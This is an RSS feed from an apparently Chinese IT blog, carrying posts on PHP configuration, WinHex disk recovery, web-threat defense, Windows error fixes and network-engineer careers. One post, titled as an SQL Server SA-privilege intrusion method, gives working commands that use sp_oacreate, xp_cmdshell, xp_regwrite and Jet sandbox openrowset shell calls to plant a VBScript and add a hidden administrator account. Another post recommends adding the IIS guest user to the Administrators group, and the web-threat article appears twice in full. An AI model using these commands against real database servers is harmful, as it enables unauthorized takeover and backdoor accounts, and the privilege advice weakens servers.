<![CDATA[TRock's Space Network]]>

<![CDATA[TRock's Space Network]]> http://www.xiangqiankun.cn/index.php zh-cn http://www.xiangqiankun.cn/read.php/67.htm <![CDATA[二级目录不能运行PHP处理方法]]> ①梦叁肆年 <admin@yourname.com> Thu, 17 Dec 2009 13:20:32 +0000 http://www.xiangqiankun.cn/read.php/67.htm
web：f:\WWWROOT

IIS设置WWWROOT为网站，访问http://url/webtest/phpinfo.php，PHP程序能正常运行。

但是设置WWWROOT目录下，webtest目录为网站，访问，http://url/phpinfo.php，无法访问虚拟目录中的php文档。

然后对比了PHPINFO，才找到原因，在php.ini里面配置了doc_root

Local Value： f:\WWWROOT

Master Value： f:\WWWROOT

在本机上试着用他的php.ini 配置，也出现了他这种情况！然后将php.ini中doc_root设置为空，即doc_root=""，然后网站中的默认目录、虚拟目录都可以正常访问。

个人认为，配置了doc_root后，php解释程序只解释doc_root指定目录下的php文档，但在IIS中设置的网站目录与php.ini中设置的doc_root目录不同时，就出现了这种情况！

以上说明代表个人意思，不过确实能解决问题。清楚原理的前辈请留言指点，谢谢！

Tags - doc root , 不能运行php ]]> http://www.xiangqiankun.cn/read.php/57.htm <![CDATA[WinHex 数据恢复之一（基础介绍）]]> ①梦叁肆年 <admin@yourname.com> Mon, 22 Jun 2009 09:07:37 +0000 http://www.xiangqiankun.cn/read.php/57.htm       先做一些基础的介绍

      1、软恢复：就是硬盘本身没有物理损伤，而是由于人为或者病毒破坏所造成的数据丢失（比如误格式化，误分区），那么这样的数据恢复就叫软恢复！

      2、数据恢复的前提：数据不能被二次破坏、覆盖！

      3、数码与码制：关于二进制、十六进制、八进制的转换，请自己GOOGLE 不重点！

      4、使用工具：WinHex（专业级）、PS：以前我用易我做过数据恢复的教程，那个软件的足限性太大了！

      5、数据结构：
          主引导纪录（MBR）：位于整个硬盘的0柱面0磁道1扇区，共占用了63个扇区，但实际只使用了1个扇区（512字节）。在总共512字节的主引导记录中，MBR又可分为三部分：第一部分：引导代码，占用了446个字节；第二部分：分区表，占用了64字节；第三部分：55AA，结束标志，占用了两个字节。后面我们要说的用winhex软件来恢复误分区，主要就是恢复第二部分：分区表。

          引导代码的作用：就是让硬盘具备可以引导的功能。如果引导代码丢失，分区表还在，那么这个硬盘作为从盘所有分区数据都还在，只是这个硬盘自己不能够用来启动进系统了。如果要恢复引导代码，可以用DOS下的命令：FDISK /MBR；这个命令只是用来恢复引导代码，不会引起分区改变，丢失数据。另外，也可以用工具软件，比如DISKGEN、WINHEX等。
        但分区表如果丢失，后果就是整个硬盘一个分区没有，就好象刚买来一个新硬盘没有分过区一样。是很多病毒喜欢破坏的区域。

         EBR，也叫做扩展MBR（Extended MBR）。因为主引导记录MBR最多只能描述4个分区项，如果想要在一个硬盘上分多于4个区，就要采用扩展MBR的办法。

        MBR、EBR是分区产生的。

Tags - 数据恢复 , winhex , 主引导纪录 , mbr , 扩展mbr , ebr ]]> http://www.xiangqiankun.cn/read.php/50.htm <![CDATA[Web攻击原因及抵御方法]]> ①梦叁肆年 <admin@yourname.com> Mon, 25 May 2009 01:49:59 +0000 http://www.xiangqiankun.cn/read.php/50.htm
　　InternetExplorer、Firefox和Windows操作系统中包含很多可以被黑客利用的漏洞，特别是在用户经常不及时安装补丁的情况下。黑客会利用这些漏洞在不经用户同意的情况下自动下载恶意软件代码——也称作隐藏式下载。

　　2.服务器漏洞

　　由于存在漏洞和服务器管理配置错误，InternetInformationServer(IIS)和Apache网络服务器经常被黑客用来攻击。

　　3.Web服务器虚拟托管

　　同时托管几个甚至数千个网站的服务器也是恶意攻击的目标。

　　4.显性/开放式代理

　　被黑客控制的计算机可以被设置为代理服务器，躲避URL过滤对通信的控制，进行匿名上网或者充当非法网站数据流的中间人。

　　5.HTML可以从网页内完全不同的服务器嵌入对象

　　用户可以从特定网站请求浏览网页，只自动地从Google分析服务器等合法网站下载对象;广告服务器;恶意软件下载网站;或者被重新导向至恶意软件网站。

　　6.普通用户对安全状况不了解

　　多数用户不了解三种SSL浏览器检查的原因;不了解如何验证所下载程序的合法性;不了解计算机是否不正常;在家庭网络内不使用防火墙;也不知道如何区分钓鱼网页和合法网页。

　　7.移动代码在网站上被广泛使用

　　在浏览器中禁用t、Javats、.NET应用、Flash或ActiveX似乎是个好主意，因为它们都会在您的计算机上自动执行脚本或代码，但是如果禁用这些功能，很多网站可能无法浏览。这为编码糟糕的Web应用开启了大门，它们接受用户输入并使用Cookies，就像在跨站点脚本(XSS)中一样。在这种情况下，某些需要访问与其他开放页面的数据(Cookies)Web应用会出现混乱。任何接受用户输入的Web应用(博客、Wikis、评论部分)可能会在无意中接受恶意代码，而这些恶意代码可以被返回给其他用户，除非用户的输入被检查确认为恶意代码。

　　8.全天候高速宽带互联网接入的广泛采用

　　多数企业网络都受防火墙的保护，而无网络地址转换(NAT)防火墙的家庭用户很容易受到攻击而丢失个人信息;充当分布式拒绝访问服务(DDOS)的僵尸计算机;安装托管恶意代码的Web服务器——家庭用户可能不会对这些状况有任何怀疑。

　　9.对HTTP和HTTPS的普遍访问

　　访问互联网必须使用Web，所有计算机都可以通过防火墙访问HTTP和HTTPS(TCP端口80和443)。可以假定所有计算机都能够访问外部网络。很多程序都通过HTTP访问互联网，例如IM和P2P软件。此外，这些被劫持的软件打开了发送僵尸网络命令的通道。

　　10.在邮件中采用嵌入式HTML

　　由于SMTP电子邮件网关会在一定程度上限制可以邮件的发送，黑客已经不经常在电子邮件中发送恶意代码。相反，电子邮件中的HTML被用于从Web上获取恶意软件代码，而用户可能根本不知道已经向可以网站发送了请求。

　　保护Web网关，阻止恶意软件

　　通过Web网关保护，您可以阻挡很多Web攻击。确保您的安全Web网关提供：

　　URL过滤功能，用于防止恶意软件下载，电话交易和错误输入

　　恶意软件扫描功能，扫描病毒、间谍软件、恶意移动代码(MMC)、有害的软件、木马、僵尸网络、蠕虫等。

　　针对HTTPS网络通信的保护，而不仅仅是HTTP和FTP

　　为真实文件类型检查有效载荷，而不是信任文件扩展名或其他为了躲避检查而进行的文件修改

　　SSL浏览器检查的强化

　　阻止访问采用IP地址而不是主机名的URL

　　只允许来自可信网站的可执行和移动代码

　　允许有选择性地访问用户(例如IT管理员)的可执行文件灰色列表中的文件

　　自动定期地一天多次从可信的反恶意软件提供商那里下载更新

　　为网络通信优化的可扩展扫描，因为用户对延迟非常敏感

　　· 避免重新扫描重复的流量

　　· 反常的大型网络下载(>200kb)，不要削弱常规网络通信扫描的性能

　　· 不要浪费资源来维护大量的活跃TCP连接(<150)

　　在流行的网络搜索引擎上进行安全搜索，尽量避免被导向恶意软件服务器

　　提供扫描引擎选择，更好地补充您的桌面扫描

　　不要相信通过IP地址访问网页

　　可以识别无限数据流，例如互联网电台广播，这些数据流永不停止，从不会被扫描

　　抵御Web威胁的十大方法

　　1.阻止对恶意软件服务器的访问

　　当台式机用户从未知的恶意软件服务器请求HTTP和HTTPS网页时，立即阻止此请求，节约带宽并扫描资源。

　　2.把移动代码限制到值得信任的网站

　　脚本和活跃代码等移动代码可以让网络更加丰富有趣，但也黑客渗透桌面计算机和运行可执行代码或应用来执行文件中嵌入的脚本。

　　3.在Web网关处扫描

　　不要认为您的所有桌面都是最新的，运行反病毒程序(AVP)或访问计算机管理完善。在恶意软件尝试进入您的网络而不是已经进入桌面之前就要进行集中扫描，从而轻松地控制所有进入的Web通信(HTTP、HTTPS和FTP)。

　　4.使用不同厂商的产品进行桌面和Web网关扫描

　　现在的攻击在发布之前都针对流行的AVP进行测试。通过恶意软件扫描的多样化增加阻止威胁的机会。

　　5.定期更新桌面和服务器补丁

　　多数攻击和威胁都利用应用和系统漏洞散播。降低已知漏洞给您的计算机带来的风险。

　　6.安装反病毒软件并保持更新

　　自引导区病毒出现之日起，安装反病毒软件已经成为标准的程序，用来检查进入的文件、扫描内存和当前文件。任何运行Windows的计算机都应当安装最新的反病毒软件。如果“坏东西”已经突破所有其他网络保护，这就是最后的防线。此外，反病毒软件可以很好地抵御通过非网络方法传播的恶意软件，例如光盘或USB闪存。

　　7.只访问通过所有浏览器检查的HTTPS网站

　　多数用户不了解三种SSL浏览器检查的重要性，或者不理解不要访问未通过所有三项检查的网站。SSL检查是过期证书;不值得信任的发布者;以及证书与所请求URL之间的主机名不匹配。

　　8.只从值得信任的网站下载可执行程序

　　社会工程在互联网上非常活跃!一种发布恶意软件的有效方式是把其捆绑到看似有用的程序中。执行以后，恶意软件就会为所欲为。这种攻击类型也称作特洛伊木马攻击。

　　9.不要访问把IP地址用作服务器的网站

　　最近的攻击越来越多地利用安装有简单Web服务器的家用计算机。受害者的机器通常通过IP地址而不是DNS主机名被导向新的家庭计算机服务器。合法网站的URL会使用主机名。

　　10.仔细地输入网址避免错误

　　用户永远不要试图访问恶意软件网站，但意外总是有可能发生。错误地输入网址通常会登录某些坐等您上门的网站。如果您的浏览器未安装所有补丁，您很可能在下载过程中下载到恶意软件。

1.桌面漏洞

　　InternetExplorer、Firefox和Windows操作系统中包含很多可以被黑客利用的漏洞，特别是在用户经常不及时安装补丁的情况下。黑客会利用这些漏洞在不经用户同意的情况下自动下载恶意软件代码——也称作隐藏式下载。

　　2.服务器漏洞

　　由于存在漏洞和服务器管理配置错误，InternetInformationServer(IIS)和Apache网络服务器经常被黑客用来攻击。

　　3.Web服务器虚拟托管

　　同时托管几个甚至数千个网站的服务器也是恶意攻击的目标。

　　4.显性/开放式代理

　　被黑客控制的计算机可以被设置为代理服务器，躲避URL过滤对通信的控制，进行匿名上网或者充当非法网站数据流的中间人。

　　5.HTML可以从网页内完全不同的服务器嵌入对象

　　用户可以从特定网站请求浏览网页，只自动地从Google分析服务器等合法网站下载对象;广告服务器;恶意软件下载网站;或者被重新导向至恶意软件网站。

　　6.普通用户对安全状况不了解

　　多数用户不了解三种SSL浏览器检查的原因;不了解如何验证所下载程序的合法性;不了解计算机是否不正常;在家庭网络内不使用防火墙;也不知道如何区分钓鱼网页和合法网页。

　　7.移动代码在网站上被广泛使用

　　在浏览器中禁用t、Javats、.NET应用、Flash或ActiveX似乎是个好主意，因为它们都会在您的计算机上自动执行脚本或代码，但是如果禁用这些功能，很多网站可能无法浏览。这为编码糟糕的Web应用开启了大门，它们接受用户输入并使用Cookies，就像在跨站点脚本(XSS)中一样。在这种情况下，某些需要访问与其他开放页面的数据(Cookies)Web应用会出现混乱。任何接受用户输入的Web应用(博客、Wikis、评论部分)可能会在无意中接受恶意代码，而这些恶意代码可以被返回给其他用户，除非用户的输入被检查确认为恶意代码。

　　8.全天候高速宽带互联网接入的广泛采用

　　多数企业网络都受防火墙的保护，而无网络地址转换(NAT)防火墙的家庭用户很容易受到攻击而丢失个人信息;充当分布式拒绝访问服务(DDOS)的僵尸计算机;安装托管恶意代码的Web服务器——家庭用户可能不会对这些状况有任何怀疑。

　　9.对HTTP和HTTPS的普遍访问

　　访问互联网必须使用Web，所有计算机都可以通过防火墙访问HTTP和HTTPS(TCP端口80和443)。可以假定所有计算机都能够访问外部网络。很多程序都通过HTTP访问互联网，例如IM和P2P软件。此外，这些被劫持的软件打开了发送僵尸网络命令的通道。

　　10.在邮件中采用嵌入式HTML

　　由于SMTP电子邮件网关会在一定程度上限制可以邮件的发送，黑客已经不经常在电子邮件中发送恶意代码。相反，电子邮件中的HTML被用于从Web上获取恶意软件代码，而用户可能根本不知道已经向可以网站发送了请求。

　　保护Web网关，阻止恶意软件

　　通过Web网关保护，您可以阻挡很多Web攻击。确保您的安全Web网关提供：

　　URL过滤功能，用于防止恶意软件下载，电话交易和错误输入

　　恶意软件扫描功能，扫描病毒、间谍软件、恶意移动代码(MMC)、有害的软件、木马、僵尸网络、蠕虫等。

　　针对HTTPS网络通信的保护，而不仅仅是HTTP和FTP

　　为真实文件类型检查有效载荷，而不是信任文件扩展名或其他为了躲避检查而进行的文件修改

　　SSL浏览器检查的强化

　　阻止访问采用IP地址而不是主机名的URL

　　只允许来自可信网站的可执行和移动代码

　　允许有选择性地访问用户(例如IT管理员)的可执行文件灰色列表中的文件

　　自动定期地一天多次从可信的反恶意软件提供商那里下载更新

　　为网络通信优化的可扩展扫描，因为用户对延迟非常敏感

　　· 避免重新扫描重复的流量

　　· 反常的大型网络下载(>200kb)，不要削弱常规网络通信扫描的性能

　　· 不要浪费资源来维护大量的活跃TCP连接(<150)

　　在流行的网络搜索引擎上进行安全搜索，尽量避免被导向恶意软件服务器

　　提供扫描引擎选择，更好地补充您的桌面扫描

　　不要相信通过IP地址访问网页

　　可以识别无限数据流，例如互联网电台广播，这些数据流永不停止，从不会被扫描

　　抵御Web威胁的十大方法

　　1.阻止对恶意软件服务器的访问

　　当台式机用户从未知的恶意软件服务器请求HTTP和HTTPS网页时，立即阻止此请求，节约带宽并扫描资源。

　　2.把移动代码限制到值得信任的网站

　　脚本和活跃代码等移动代码可以让网络更加丰富有趣，但也黑客渗透桌面计算机和运行可执行代码或应用来执行文件中嵌入的脚本。

　　3.在Web网关处扫描

　　不要认为您的所有桌面都是最新的，运行反病毒程序(AVP)或访问计算机管理完善。在恶意软件尝试进入您的网络而不是已经进入桌面之前就要进行集中扫描，从而轻松地控制所有进入的Web通信(HTTP、HTTPS和FTP)。

　　4.使用不同厂商的产品进行桌面和Web网关扫描

　　现在的攻击在发布之前都针对流行的AVP进行测试。通过恶意软件扫描的多样化增加阻止威胁的机会。

　　5.定期更新桌面和服务器补丁

　　多数攻击和威胁都利用应用和系统漏洞散播。降低已知漏洞给您的计算机带来的风险。

　　6.安装反病毒软件并保持更新

　　自引导区病毒出现之日起，安装反病毒软件已经成为标准的程序，用来检查进入的文件、扫描内存和当前文件。任何运行Windows的计算机都应当安装最新的反病毒软件。如果“坏东西”已经突破所有其他网络保护，这就是最后的防线。此外，反病毒软件可以很好地抵御通过非网络方法传播的恶意软件，例如光盘或USB闪存。

　　7.只访问通过所有浏览器检查的HTTPS网站

　　多数用户不了解三种SSL浏览器检查的重要性，或者不理解不要访问未通过所有三项检查的网站。SSL检查是过期证书;不值得信任的发布者;以及证书与所请求URL之间的主机名不匹配。

　　8.只从值得信任的网站下载可执行程序

　　社会工程在互联网上非常活跃!一种发布恶意软件的有效方式是把其捆绑到看似有用的程序中。执行以后，恶意软件就会为所欲为。这种攻击类型也称作特洛伊木马攻击。

　　9.不要访问把IP地址用作服务器的网站

　　最近的攻击越来越多地利用安装有简单Web服务器的家用计算机。受害者的机器通常通过IP地址而不是DNS主机名被导向新的家庭计算机服务器。合法网站的URL会使用主机名。

　　10.仔细地输入网址避免错误

　　用户永远不要试图访问恶意软件网站，但意外总是有可能发生。错误地输入网址通常会登录某些坐等您上门的网站。如果您的浏览器未安装所有补丁，您很可能在下载过程中下载到恶意软件。

Tags - web攻击 , web防御 ]]> http://www.xiangqiankun.cn/read.php/48.htm <![CDATA[调用该函数时 RasSetEntryProperties 函数失败错误 621]]> ①梦叁肆年 <admin@yourname.com> Thu, 21 May 2009 09:10:23 +0000 http://www.xiangqiankun.cn/read.php/48.htm      RasSetEntryProperties function fails with error 621 when you call the function in a service that is running under a local system account

CAUSE：
         The lpszPhonebook parameter is a pointer to a null-terminated string that specifies the full path and file name of a phonebook (.pbk) file. If this parameter is NULL, the function uses the current default phonebook file. When you call the RasSetEntryProperties function in a Win32 service that is running under the context of the local system account, and the lpszPhonebook parameter is set to NULL, the function tries to locate the phonebook file in the %Documents and Settings%\LocalSystem folder. However, the %Documents and Settings%\LocalSystem folder does not exist, and you receive the 621 error message.

RESOLUTION：
      You can pass in the complete path of the All Users remote access phonebook file to the RasSetEntryProperties function to create the entry. The following is the complete path:
%Documents and Settings%\All Users\Application Data\Microsoft\Network\Connections\Pbk\Rasphone.pbk
Tags - rassetentryproperties ]]> http://www.xiangqiankun.cn/read.php/46.htm <![CDATA[09年后对网络工程师有哪些新要求]]> ①梦叁肆年 <admin@yourname.com> Fri, 15 May 2009 01:04:54 +0000 http://www.xiangqiankun.cn/read.php/46.htm

起初，人们认为网络工程师就是网管，只负责网络运行与维护。其实，在瞬息万变的网络世界里，网络工程师们活跃的地方已经远远超越了那样的界限，而是在经济社会的各个领域里发挥着自己的作用。也就是说，网络工程师不仅可以在IT类的公司工作，而且可以在很多非IT类的公司找到自己的立足点，因此相比之下，属于就业面比较宽的人才类型。例如：系统集成、信息安全、技术支持、项目经理、产品销售、系统架构、系统分析等。真正的网络工程师应具备ADIT，即Analysis(分析问题的能力)、Design(规划设计解决问题方案的能力)、Implementing(实现规划方案的能力)、Troubleshooting(监测整个方案的执行并及时对故障进行排查的能力)。

　当前网络工程师的需求状况

国内信息化建设的主体严重缺乏从事信息系统的建设、运行和维护等工作的专业网络技术人员。全国的高等院校每年为社会输送区区几万计算机网络专业的毕业生，而整个社会需要的却是数以百万计的具有专业技能的网络技术人员，人才供应能力远远小于实际的社会需求。高等院校的学历教育偏重于网络技术的基本理论和基础知识的传授，而网络技术有技术更新快、产品周期短的特点。因此，这些院校的毕业生往往是网络技术知识比较陈旧，缺乏网络技术应用的实际操作技能和经验，无法满足所在单位对他们的工作要求。

从短期的在职培训转变为中长期的就业教育主要是基于这样两个背景：一是IT产业需要大量的技术灰领，市场存在巨大的人才需求；另一方面，大量的待业或无业青年需要有一个就业机会。而从现在的形势来看，在IT领域最缺乏的就是网络工程师。

网络工程师的学习方面

就网络工程师的学习方面来说,网络工程师集系统开发、系统集成、网站维护的能力于一体，学习过程中注重实践,对于基础相对薄弱的人来说较为容易学习，对自身将来就业也大有帮助。业内资深人士表示，网络产业作为21世纪的朝阳产业，有很大的市场需求。就目前而言，市场需求在快速增长，但还远没有形成它应有的规模，只需要稍假以时日，未来的辉煌是必然的。

　　从纯技术角度讲，IT最大的阵营是：软件工程、核心系统这2块，我们所说的核心系统分成三大部分：1、网络系统2、主机系统3、数据库系统；这三大部分里面还有细分的，如网络分：架构、安全、语音、传输等；主机分操作系统、存储、应用服务等；具体的职位就是网络工程师、系统工程师、数据库工程师，这是从纯技术角度而言，实际上还有售前支持、售后维护、开发、咨询、顾问、培训及对应从事的行业之分

网络工程师的就业范围相当宽广，几乎所有的IT企业都需要网络工程师帮助用户设计和建设计算机信息系统；几乎所有拥有计算机信息系统的IT客户都需要网络工程师负责运行和维护工作。因此，网络工程师的就业机会比软件工程师多，可在数据库管理、WEB开发、IT销售、互联网程序设计、数据库应用、网络开发和客户支持等领域发展。而且，薪酬待遇也不错，统计数据显示，网络技术人员平均月薪约2000～3000元，高的则在5000元以上。

　1）熟悉计算机系统的基础知识；（2）熟悉网络操作系统的基础知识；（3）理解计算机应用系统的设计和开发方法；（4）熟悉数据通信的基础知识；（5）熟悉系统安全和数据安全的基础知识；（6）掌握网络安全的基本技术和主要的安全协议与安全系统；（7）掌握计算机网络体系结构和网络协议的基本原理；（8）掌握计算机网络有关的标准化知识；（9）掌握局域网组网技术，理解城域网和广域网基本技术；（10）掌握计算机网络互联技术；（11）掌握TCP/IP协议网络的联网方法和网络应用服务技术；（12）理解接入网与接入技术；（13）掌握网络管理的基本原理和操作方法；（14）熟悉网络系统的性能测试和优化技术，以及可靠性设计技术；（15）理解网络应用的基本原理和技术；（16）理解网络新技术及其发展趋势；（17）了解有关知识产权和互联网的法律法规；（18）正确阅读和理解本领域的英文资料。

Tags - 网络工程师 ]]> http://www.xiangqiankun.cn/read.php/45.htm <![CDATA[Microsoft JET Database Engine 错误 80004005 解决办法]]> ①梦叁肆年 <admin@yourname.com> Wed, 06 May 2009 01:56:51 +0000 http://www.xiangqiankun.cn/read.php/45.htm
当时又非常需要那个程序所以在网上找了很多资料！

现在写一下解决方案绝对有效！

一、IIS的来宾访问用户设置成管理员组，在计算机管理--用户中，找到IUSR_****，隶属于添加 administrators，然后需要重启IIS，看网站可以打开了不，把IIS的来宾访问用户设置成管理员！本地测试没关系的！

二、2、C:WindowsTemp 设置everyone或者user的写权限,推荐user此方法如果不行，那可能是环境变量没有设在

C:WindowsTemp

而是在：C:\Documents and Settings\administrator\Local Settings\ temp

把环境变量改了就没有问题了。当然环境变量改了后，要重启计算机才行

Tags - microsoft , jet , database , engine , 错误 , '80004005',asp+access ]]> http://www.xiangqiankun.cn/read.php/41.htm <![CDATA[SQL Server SA权限入侵方法]]> ①梦叁肆年 <admin@yourname.com> Thu, 23 Apr 2009 00:37:44 +0000 http://www.xiangqiankun.cn/read.php/41.htm

set wsnetwork=CreateObject("WSCRIPT.NETWORK")

os="WinNT://"&wsnetwork.ComputerName

Set ob=GetObject(os) '得到adsi接口,绑定

Set oe=GetObject(os&"/Administrators,group") '属性,admin组

Set od=ob.Create("user","xiangqiankun") '建立用户

od.SetPassword "1234" '设置密码

od.SetInfo '保存

Set of=GetObject(os&"/test",user) '得到用户

oe.add os&"/test"

将上面的代码保存为sa.vbs，然后执行，命令为“cscript sa.vbs”，这样就会在系统添加一个系统名为xiangqiankun，密码为1234的用户。具体在查询分析器执行的代码如下：

declare @o int, @f int, @t int, @ret int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o, 'createtextfile', @f out, 'c:/sa.vbs', 1

exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject

("WSCRIPT.NETWORK")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.

ComputerName'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject

(os&"/Administrators,group")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create

("user","xiangqiankun")'

exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "1234"'

exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo '

exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject

(os&"/xiangqiankun",user) '

exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/xiangqiankun"'

       执行完上面的语句，再执行下面这行代码，这行代码一定单独执行，不要与上面的放在一起执行，否则会提示“c:/sa.vbs正被另一个程序运行”而无法成功添加用户：

exec master..xp_cmdshell 'cscript c:/sa.vbs'

       如果系统用户没有添加成功，有可能是因为系统用户的密码1234的太简单，不符合服务器的复杂密码策略，可以考虑设置的复杂些，然后再测试一下。也可以使用echo将代码写到sa.vbs中，代码格式为：

exec master..xp_cmdshell 'echo set wsnetwork=CreateObject("WSCRIPT.NETWORK")

>>sa.vbs'

       使用jet沙盘模式，可以解决XP_cmdshell等存储过程和相关动态链接库带来的烦恼。出于安全原因，系统默认情况下沙盘模式未开启，这就需要xp_regwrite开启沙盘模式：

Exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0

/Engines','SandBoxMode','REG_DWORD',1

然后执行沙盘命令，在系统添加一个用户名为test，密码为1234的用户：

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows

/system32/ias/ias.mdb','select shell("cmd.exe /c net user test 1234 /add")')

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/windows

/system32/ias/ias.mdb','select shell("cmd.exe /c net localgroup

administrators test /add")')

不同的操作系统，路径也不一样，需要根据情况做修改：

NT/2K: c:/winnt/system32/

XP/2003: c:/windows/system32/

另外Microsoft SQL Server2005在默认情况下，一些存储过程是关闭着的，需要命令打开：

开启XP_cmdshell：

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure

'xp_cmdshell', 1;RECONFIGURE;

开启'OPENROWSET'：

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure

'Ad Hoc Distributed Queries',1;RECONFIGURE;

开启'sp_oacreate':

exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp

Tags - sqlserver , sa权限 , 入侵 ]]> http://www.xiangqiankun.cn/read.php/40.htm <![CDATA[安装程序无法复制文件 staxmem.dll]]> ①梦叁肆年 <admin@yourname.com> Thu, 16 Apr 2009 14:39:01 +0000 http://www.xiangqiankun.cn/read.php/40.htm

       成因：
          Secedit.sdb 数据库文件已损坏。
          Windows 组件向导 (Sysocmgr.exe) 必须在原始 Windows XP Professional CD 和 Windows XP Professional SP2 CD 同时可用的情况下安装文件。

        要解决此问题，请首先运行 Esentutl.exe 工具以检查 Secedit.sdb 数据库的完整性。为此，请按照下列步骤操作：

    1、单击“开始”，单击“运行”，键入 cmd，然后单击“确定”。
    2、在命令提示符处，键入以下命令esentutl /g Drive:\WinDir\security\database\secedit.sdb 。

       注意：在该命令中，Drive 是安装了 Windows XP Professional 的硬盘驱动器，WinDir 是安装了 Windows XP Professional 的文件夹。比如说我的我安装就是C:\WINDOWS   所以：我应该输入：esentutl /g  C:\WINDOWS\security\database\secedit.sdb

       我运行完了后，出现如下提示：

Microsoft(R) Windows(TM) Database Utilities
Version 5.1
Copyright (C) Microsoft Corporation. All Rights Reserved.

Error: Access to source database 'Drive:\WinDir\security\database\secedit.sdb' f
ailed with Jet error -1022.

Operation terminated with error -1022 (JET_errDiskIO, Disk IO error) after 0.0 s
econds.

然后我接着运行：esentutl /p Drive:\WinDir\security\database\secedit.sdb

就出现一个WARNING
you shoud only run reqair on damagde……

然后确定。。。

然后我再装IIS 就OK了。

官网上写得太复杂，如果有兴趣可以看看。～～～
给个地址：http://support.microsoft.com/?kbid=894351
Tags - 安装程序无法复制文件staxmem.dll ]]> http://www.xiangqiankun.cn/read.php/36.htm <![CDATA[当前安全设置不允许从该位置下载文件解决方法]]> ①梦叁肆年 <admin@yourname.com> Sun, 29 Mar 2009 03:01:03 +0000 http://www.xiangqiankun.cn/read.php/36.htm

遇到这种情况，很简单。在 IE 中选择“工具”，“INTERNET 选项” 进入“安全”选项卡，“internet ” "自定义级别" ，找到下载项，选”启用“就可以了。如下图：

Tags - 当前安全设置不允许从该位置下载文件 ]]> http://www.xiangqiankun.cn/read.php/35.htm <![CDATA[一个不常见的服务器故障分析]]> ①梦叁肆年 <admin@yourname.com> Fri, 27 Mar 2009 11:52:21 +0000 http://www.xiangqiankun.cn/read.php/35.htm
        1、计算机前些天常常重启；
        2、换电源后，计算机不重启了；
        3、WIN2003的系统（英文化版的），在按CTRL+ALT+DEL输入密码确定后，蓝屏；
        4、换了一个装有XP系统的硬盘，接到主板上，将原来的磁盘取下来，一进系统，也蓝屏；
        5、试试换内条，换后，也依然这样。
        6、在新换的硬盘上试着装系统，也出现同样的情况，装了不系统；
        7、试过安全模式，进不了系统；
        8、挂一光盘，挂原来的硬盘，光驱引导，用PE进系统，进入后，无法识别出原来的硬盘；
        9、不能尝试恢复BIOS的默认，因为是基于主板做的盘阵；
        10、把原来的硬盘，接到另一块主板上，用PE进系统，发现硬盘的磁盘分区表丢失掉了；

        我最后得到的原因，可能有一定的片面性，也仅仅是给朋友们提供一个思路

        计算机常常重启，机箱灰尘过多，更换电源后，由于电压的不稳的原因，以致磁盘分区表和阵列驱动故障。

        单接一块XP系统盘，蓝屏，是因为做有阵列，虽然之前我是关了阵列，但是阵列驱动有问题关闭无效无法加裁硬盘。

        原来出自硬盘和主板上，换内存条自然没有什么用！

        分区表丢掉了，自然进了不安全，掉在别的机子上，也自然没有分区信息。

Tags - 服务器蓝屏 , 盘阵 , 故障 , 原因分析 ]]>